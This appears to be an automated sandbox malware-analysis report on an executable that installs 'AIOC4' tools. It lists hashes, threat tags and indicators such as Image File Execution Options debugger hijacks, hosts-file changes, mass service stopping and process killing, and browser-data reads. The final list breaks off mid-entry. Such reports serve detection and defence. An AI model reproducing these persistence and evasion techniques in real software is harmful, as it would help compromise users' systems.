6e83d9e27d565709d8ee5980ff30cd4db9f0ffaf57ff81fdcca468556e189ad2

Analysis

max time kernel
169s
max time network
173s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
25-11-2022 03:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

74161da72b92f3dc29efa72b75dcf86c.exe
Size

19.9MB
MD5

74161da72b92f3dc29efa72b75dcf86c
SHA1

8490c1331b1c40ce986306d5dda51670f93fd78c
SHA256

6e83d9e27d565709d8ee5980ff30cd4db9f0ffaf57ff81fdcca468556e189ad2
SHA512

ced5b9e9358e9ebeed90d1f65fa994adcc55efb3ec9de1e382e671bd584777733ade7bb309031674797d68b8338cd79873a3e467a831ade9fb8159be96b58c5f
SSDEEP

393216:Dowc0wiNiY5FZqOlRQKihdkdByFFCEJnBdTikjkDAWIjoS1SpyEeqBAClYljKAgA:pXbeOyFFCYBdTikgcWxS1OdeqGCluCAF

Score

8^/10

discovery evasion exploit persistence spyware stealer upx

Malware Config

Signatures

Drops file in Drivers directory 2 IoCs

Processes:

AIOC4.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts
File opened for modification	C:\Windows\system32\drivers\etc\hosts	AIOC4.exe

Executes dropped EXE 14 IoCs

Processes:

StartNetApp.exes_a.exeAIOC4.exePrimaryScreen.exeAIOC4.exePrimaryScreen.exeAIOC4.exePrimaryScreen.exeAIOC4.exearia2c.exes_a.exe7z.exeNSudoLG.exe7z.exe

pid	process
1564	StartNetApp.exe
1836	s_a.exe
1356	AIOC4.exe
556	PrimaryScreen.exe
1740	AIOC4.exe
1772	PrimaryScreen.exe
300	AIOC4.exe
1120	PrimaryScreen.exe
1400	AIOC4.exe
2356	aria2c.exe
1524	s_a.exe
2500	7z.exe
2520	NSudoLG.exe
964	7z.exe

Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exe

pid process

2856 takeown.exe
1740
2136
2568

pid	process
2856	takeown.exe
1740
2136
2568

Sets file execution options in registry 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

StartNetApp.exeAIOC4.exeAIOC4.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AIOC4.exe	StartNetApp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AutodeskInstallOnlineCheck3.exe	StartNetApp.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AIOC4.exe\dpiAwareness = "1"	AIOC4.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AU_CN.exe	AIOC4.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AU_CN.exe\Debugger = "C:\\Program Files\\AIOC4\\AIOC4.exe"	AIOC4.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AUCN.exe	AIOC4.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AUCN.exe\Debugger = "C:\\Program Files\\AIOC4\\AIOC4.exe"	AIOC4.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Program Files\AIOC4\StartNetApp.exe	upx
\Program Files\AIOC4\StartNetApp.exe	upx
\Program Files\AIOC4\StartNetApp.exe	upx
\Program Files\AIOC4\StartNetApp.exe	upx
C:\Program Files\AIOC4\StartNetApp.exe	upx
C:\Program Files\AIOC4\StartNetApp.exe	upx
behavioral1/memory/1564-75-0x0000000000400000-0x000000000055A000-memory.dmp	upx

Loads dropped DLL 18 IoCs

Processes:

74161da72b92f3dc29efa72b75dcf86c.exeStartNetApp.exeAIOC4.exe7z.exe7z.exe

pid	process
848	74161da72b92f3dc29efa72b75dcf86c.exe
848	74161da72b92f3dc29efa72b75dcf86c.exe
848	74161da72b92f3dc29efa72b75dcf86c.exe
848	74161da72b92f3dc29efa72b75dcf86c.exe
848	74161da72b92f3dc29efa72b75dcf86c.exe
1564	StartNetApp.exe
300	AIOC4.exe
300	AIOC4.exe
300	AIOC4.exe
300	AIOC4.exe
300	AIOC4.exe
300	AIOC4.exe
2500	7z.exe
300	AIOC4.exe
1232
300	AIOC4.exe
300	AIOC4.exe
964	7z.exe

Modifies file permissions 1 TTPs 4 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exe

pid process

2856 takeown.exe
1740
2136
2568
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2856	takeown.exe
1740
2136
2568

Drops file in Program Files directory 64 IoCs

Processes:

74161da72b92f3dc29efa72b75dcf86c.exe7z.exe7z.exe

description	ioc	process
File opened for modification	C:\Program Files\AIOC4\Accessibility.dll	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\7-Zip\x64\7z.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\Resources\AA\7-Zip\x64\7za.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\Resources\AA\7-Zip\x86\7za.dll	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\Win32\NSudoLG.pdb	7z.exe
File opened for modification	C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\Win32\NSudoLC.exe	7z.exe
File opened for modification	C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\x64	7z.exe
File created	C:\Program Files\AIOC4\SetACL64.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\Resources\AA\ShowWindow.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\msi_x64.dll	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\ARM64\NSudo.json	7z.exe
File opened for modification	C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\ARM64\NSudoLG.exe	7z.exe
File opened for modification	C:\Program Files\AIOC4\aria2\x86\aria2c.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\aria2\x86\dht6.dat	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\TipSafe.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\Resources\AA\aria2\x64\dht.dat	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\Resources\AA\7-Zip\x86\7z.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\ARM64\NSudoLC.pdb	7z.exe
File opened for modification	C:\Program Files\AIOC4\aria2\x64\aria2c.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\7-Zip\x64	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\7-Zip\x86\7za.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\Microsoft.CSharp.dll	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\Resources\AA\7-Zip\x86\7zxa.dll	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\x64\NSudoLC.pdb	7z.exe
File created	C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\x64\NSudoLC.exe	7z.exe
File opened for modification	C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\x64	7z.exe
File opened for modification	C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\Win32\NSudoLC.pdb	7z.exe
File created	C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\NSudo.bat	7z.exe
File created	C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\Win32\NSudoLC.exe	7z.exe
File opened for modification	C:\Program Files\AIOC4\System.Numerics.dll	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\icacls_x86.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\Resources\AA\aria2\x64\aria2.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\StartNetApp.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\ARM64\NSudoLC.exe	7z.exe
File created	C:\Program Files\AIOC4\Robocopy_x64.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\7-Zip\x86\7za.dll	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\Resources\AA\7-Zip\x64\7za.dll	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\Resources\AA\aria2\x86\aria2.session	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\7-Zip\x86\7z.dll	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\aria2\x64\aria2.session	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\Resources\AA\3dsMaxDefaultOpen.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\Resources\AA\SetACL64.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\Language\zh-CN\GetLastError.ini	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\Language\801A048D8E177F0C7D7B71C4336E985F	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\AIOC4.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\Resources\AA\7-Zip\x86\7zxa.dll	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\Win32\NSudoLG.exe	7z.exe
File created	C:\Program Files\AIOC4\netsh_x64.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\Resources\AA\7-Zip\x64\7zxa.dll	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\taskkill_x64.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\Resources\AA\aria2\x86\aria2.session	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\Resources\AA\aria2\AriaNg.url	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\Resources\AA\Updater.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\xcopy_x86.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\PrimaryScreen.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\Resources\AA\7-Zip\x64\7za.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\netsh_x64.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\7-Zip\x86\7za.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\Resources\AA\7-Zip\x86\7z.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\s_a.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\System.Numerics.dll	74161da72b92f3dc29efa72b75dcf86c.exe
File created	C:\Program Files\AIOC4\aria2\x64\dht.dat	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\cmd_x64.exe	74161da72b92f3dc29efa72b75dcf86c.exe
File opened for modification	C:\Program Files\AIOC4\cmd_x86.exe	74161da72b92f3dc29efa72b75dcf86c.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
1652
3044	sc.exe
2100	sc.exe
2984	sc.exe
2128	sc.exe
2196	sc.exe
2840	sc.exe
2816	sc.exe
2808	sc.exe
688
2872	sc.exe
2820	sc.exe
2892	sc.exe
2884	sc.exe
1356	sc.exe
2596	sc.exe
2936	sc.exe
2368	sc.exe
2828	sc.exe
2468	sc.exe
2152	sc.exe
2892	sc.exe
2032	sc.exe
2108	sc.exe
2792	sc.exe
2352	sc.exe
2244	sc.exe
1728	sc.exe
2932	sc.exe
2580	sc.exe
3036	sc.exe
2348	sc.exe
1536	sc.exe
1356	sc.exe
2260	sc.exe
960	sc.exe
2968	sc.exe
2952	sc.exe
1168
2092	sc.exe
2148	sc.exe
1316	sc.exe
2640	sc.exe
3060	sc.exe
2628	sc.exe
3016	sc.exe
2744	sc.exe
2900
1252
1660	sc.exe
2912	sc.exe
2748	sc.exe
2260
2916	sc.exe
1036	sc.exe
2684	sc.exe
2000	sc.exe
2816
2500	sc.exe
2760	sc.exe
2396	sc.exe
2336	sc.exe
2144	sc.exe
804	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2080 schtasks.exe
Enumerates processes with tasklist 1 TTPs 9 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid process

596 tasklist.exe
2396
1992 tasklist.exe
2540 tasklist.exe
1760 tasklist.exe
2080 tasklist.exe
836 tasklist.exe
880 tasklist.exe
1500 tasklist.exe

pid	process
2080	schtasks.exe

pid	process
596	tasklist.exe
2396
1992	tasklist.exe
2540	tasklist.exe
1760	tasklist.exe
2080	tasklist.exe
836	tasklist.exe
880	tasklist.exe
1500	tasklist.exe

Kills process with taskkill 64 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
2968	taskkill.exe
2544	taskkill.exe
2496	taskkill.exe
2128	taskkill.exe
2764	taskkill.exe
2216	taskkill.exe
2000	taskkill.exe
2152	taskkill.exe
2720	taskkill.exe
2144	taskkill.exe
2548	taskkill.exe
2992	taskkill.exe
1168	taskkill.exe
1560	taskkill.exe
2980	taskkill.exe
2108	taskkill.exe
2508	taskkill.exe
1168	taskkill.exe
1212	taskkill.exe
2652
2248	taskkill.exe
2544	taskkill.exe
3004	taskkill.exe
2348	taskkill.exe
2632	taskkill.exe
2780	taskkill.exe
2624	taskkill.exe
960	taskkill.exe
2288	taskkill.exe
2488	taskkill.exe
2340	taskkill.exe
2896	taskkill.exe
2608	taskkill.exe
2552	taskkill.exe
2820	taskkill.exe
2408	taskkill.exe
1356	taskkill.exe
1996	taskkill.exe
2492	taskkill.exe
2284	taskkill.exe
2564
2832
1356
2788	taskkill.exe
2836	taskkill.exe
2016	taskkill.exe
2692	taskkill.exe
2396	taskkill.exe
2868	taskkill.exe
2352	taskkill.exe
2760	taskkill.exe
1660	taskkill.exe
2872	taskkill.exe
272	taskkill.exe
2920	taskkill.exe
524	taskkill.exe
1820	taskkill.exe
528	taskkill.exe
2896
2976	taskkill.exe
568	taskkill.exe
556	taskkill.exe
2928	taskkill.exe
2632	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 16 IoCs

adware spyware

Modify Registry

T1112

Processes:

StartNetApp.exeAIOC4.exeAIOC4.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-575491160-2295418218-1540667289-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	StartNetApp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\TestSubKey	AIOC4.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\TestSubKey	AIOC4.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\TestSubKey	AIOC4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\AIOC4.exe = "11001"	AIOC4.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\TestValue = "TestValue"	AIOC4.exe
Key created	\REGISTRY\USER\S-1-5-21-575491160-2295418218-1540667289-1000\Software\Microsoft\Internet Explorer\Main	StartNetApp.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\TestValue = "TestValue"	AIOC4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\AIOC4.exe = "11001"	AIOC4.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\TestValue = "TestValue"	AIOC4.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\TestSubKey	AIOC4.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\TestSubKey	AIOC4.exe
Key created	\REGISTRY\USER\S-1-5-21-575491160-2295418218-1540667289-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	StartNetApp.exe
Key created	\REGISTRY\USER\S-1-5-21-575491160-2295418218-1540667289-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl	StartNetApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-575491160-2295418218-1540667289-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\StartNetApp.exe = "11001"	StartNetApp.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\TestSubKey	AIOC4.exe

Runs ping.exe 1 TTPs 15 IoCs

Remote System Discovery

T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid	process
2328	PING.EXE
2636	PING.EXE
2224	PING.EXE
2248	PING.EXE
1948	PING.EXE
2180	PING.EXE
2136	PING.EXE
3008	PING.EXE
1700	PING.EXE
2276	PING.EXE
2192	PING.EXE
2204
2948
2712	PING.EXE
1016	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

StartNetApp.exes_a.exeAIOC4.exe

pid	process
1564	StartNetApp.exe
1564	StartNetApp.exe
1564	StartNetApp.exe
1564	StartNetApp.exe
1564	StartNetApp.exe
1564	StartNetApp.exe
1564	StartNetApp.exe
1564	StartNetApp.exe
1836	s_a.exe
1836	s_a.exe
1836	s_a.exe
1356	AIOC4.exe
1356	AIOC4.exe
1356	AIOC4.exe
1356	AIOC4.exe
1356	AIOC4.exe
1564	StartNetApp.exe
1836	s_a.exe
1836	s_a.exe
1356	AIOC4.exe
1356	AIOC4.exe
1356	AIOC4.exe
1564	StartNetApp.exe
1356	AIOC4.exe
1356	AIOC4.exe
1356	AIOC4.exe
1836	s_a.exe
1564	StartNetApp.exe
1836	s_a.exe
1836	s_a.exe
1356	AIOC4.exe
1356	AIOC4.exe
1356	AIOC4.exe
1356	AIOC4.exe
1564	StartNetApp.exe
1356	AIOC4.exe
1356	AIOC4.exe
1836	s_a.exe
1564	StartNetApp.exe
1836	s_a.exe
1356	AIOC4.exe
1356	AIOC4.exe
1356	AIOC4.exe
1356	AIOC4.exe
1356	AIOC4.exe
1356	AIOC4.exe
1356	AIOC4.exe
1356	AIOC4.exe
1356	AIOC4.exe
1356	AIOC4.exe
1356	AIOC4.exe
1356	AIOC4.exe
1836	s_a.exe
1564	StartNetApp.exe
1836	s_a.exe
1564	StartNetApp.exe
1836	s_a.exe
1836	s_a.exe
1564	StartNetApp.exe
1836	s_a.exe
1564	StartNetApp.exe
1836	s_a.exe
1564	StartNetApp.exe
1836	s_a.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

AIOC4.exe

pid process

1400 AIOC4.exe

pid	process
1400	AIOC4.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

StartNetApp.exes_a.exeAIOC4.exeAIOC4.exeAIOC4.exeAIOC4.exetasklist.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exes_a.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	1564	StartNetApp.exe
Token: SeDebugPrivilege	1836	s_a.exe
Token: SeDebugPrivilege	1356	AIOC4.exe
Token: SeDebugPrivilege	1740	AIOC4.exe
Token: SeDebugPrivilege	300	AIOC4.exe
Token: SeDebugPrivilege	1400	AIOC4.exe
Token: SeDebugPrivilege	1992	tasklist.exe
Token: SeDebugPrivilege	2124	taskkill.exe
Token: SeDebugPrivilege	2172	taskkill.exe
Token: SeDebugPrivilege	2200	taskkill.exe
Token: SeDebugPrivilege	2228	taskkill.exe
Token: SeDebugPrivilege	2256	taskkill.exe
Token: SeDebugPrivilege	2284	taskkill.exe
Token: SeDebugPrivilege	2312	taskkill.exe
Token: SeDebugPrivilege	2340	taskkill.exe
Token: SeDebugPrivilege	2408	taskkill.exe
Token: SeDebugPrivilege	2436	taskkill.exe
Token: SeDebugPrivilege	2464	taskkill.exe
Token: SeDebugPrivilege	2492	taskkill.exe
Token: SeDebugPrivilege	2520	taskkill.exe
Token: SeDebugPrivilege	2548	taskkill.exe
Token: SeDebugPrivilege	2576	taskkill.exe
Token: SeDebugPrivilege	2604	taskkill.exe
Token: SeDebugPrivilege	2632	taskkill.exe
Token: SeDebugPrivilege	2660	taskkill.exe
Token: SeDebugPrivilege	2688	taskkill.exe
Token: SeDebugPrivilege	2716	taskkill.exe
Token: SeDebugPrivilege	2748	taskkill.exe
Token: SeDebugPrivilege	2780	taskkill.exe
Token: SeDebugPrivilege	2808	taskkill.exe
Token: SeDebugPrivilege	2836	taskkill.exe
Token: SeDebugPrivilege	2868	taskkill.exe
Token: SeDebugPrivilege	2896	taskkill.exe
Token: SeDebugPrivilege	2928	taskkill.exe
Token: SeDebugPrivilege	2956	taskkill.exe
Token: SeDebugPrivilege	2988	taskkill.exe
Token: SeDebugPrivilege	3016	taskkill.exe
Token: SeDebugPrivilege	3044	taskkill.exe
Token: SeDebugPrivilege	2072	taskkill.exe
Token: SeDebugPrivilege	844	taskkill.exe
Token: SeDebugPrivilege	1948	taskkill.exe
Token: SeDebugPrivilege	1708	taskkill.exe
Token: SeDebugPrivilege	1524	s_a.exe
Token: SeDebugPrivilege	676	taskkill.exe
Token: SeDebugPrivilege	1668	taskkill.exe
Token: SeDebugPrivilege	2268	taskkill.exe
Token: SeDebugPrivilege	2456
Token: SeIncreaseQuotaPrivilege	2624
Token: SeSecurityPrivilege	2624
Token: SeTakeOwnershipPrivilege	2624
Token: SeLoadDriverPrivilege	2624
Token: SeSystemProfilePrivilege	2624
Token: SeSystemtimePrivilege	2624
Token: SeProfSingleProcessPrivilege	2624
Token: SeIncBasePriorityPrivilege	2624
Token: SeCreatePagefilePrivilege	2624
Token: SeBackupPrivilege	2624
Token: SeRestorePrivilege	2624
Token: SeShutdownPrivilege	2624
Token: SeDebugPrivilege	2624
Token: SeSystemEnvironmentPrivilege	2624
Token: SeRemoteShutdownPrivilege	2624
Token: SeUndockPrivilege	2624
Token: SeManageVolumePrivilege	2624

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

AIOC4.exe

pid process

300 AIOC4.exe
300 AIOC4.exe

pid	process
300	AIOC4.exe
300	AIOC4.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

74161da72b92f3dc29efa72b75dcf86c.exeStartNetApp.exeAIOC4.exe

description	pid	process	target process
PID 848 wrote to memory of 1564	848	74161da72b92f3dc29efa72b75dcf86c.exe	StartNetApp.exe
PID 848 wrote to memory of 1564	848	74161da72b92f3dc29efa72b75dcf86c.exe	StartNetApp.exe
PID 848 wrote to memory of 1564	848	74161da72b92f3dc29efa72b75dcf86c.exe	StartNetApp.exe
PID 848 wrote to memory of 1564	848	74161da72b92f3dc29efa72b75dcf86c.exe	StartNetApp.exe
PID 1564 wrote to memory of 1836	1564	StartNetApp.exe	s_a.exe
PID 1564 wrote to memory of 1836	1564	StartNetApp.exe	s_a.exe
PID 1564 wrote to memory of 1836	1564	StartNetApp.exe	s_a.exe
PID 1564 wrote to memory of 1836	1564	StartNetApp.exe	s_a.exe
PID 1564 wrote to memory of 1356	1564	StartNetApp.exe	AIOC4.exe
PID 1564 wrote to memory of 1356	1564	StartNetApp.exe	AIOC4.exe
PID 1564 wrote to memory of 1356	1564	StartNetApp.exe	AIOC4.exe
PID 1564 wrote to memory of 1356	1564	StartNetApp.exe	AIOC4.exe
PID 1356 wrote to memory of 2000	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 2000	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 2000	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 900	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 900	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 900	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 840	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 840	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 840	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 1400	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 1400	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 1400	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 1640	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 1640	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 1640	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 1620	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 1620	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 1620	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 584	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 584	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 584	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 772	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 772	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 772	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 1804	1356	AIOC4.exe	cmd.exe
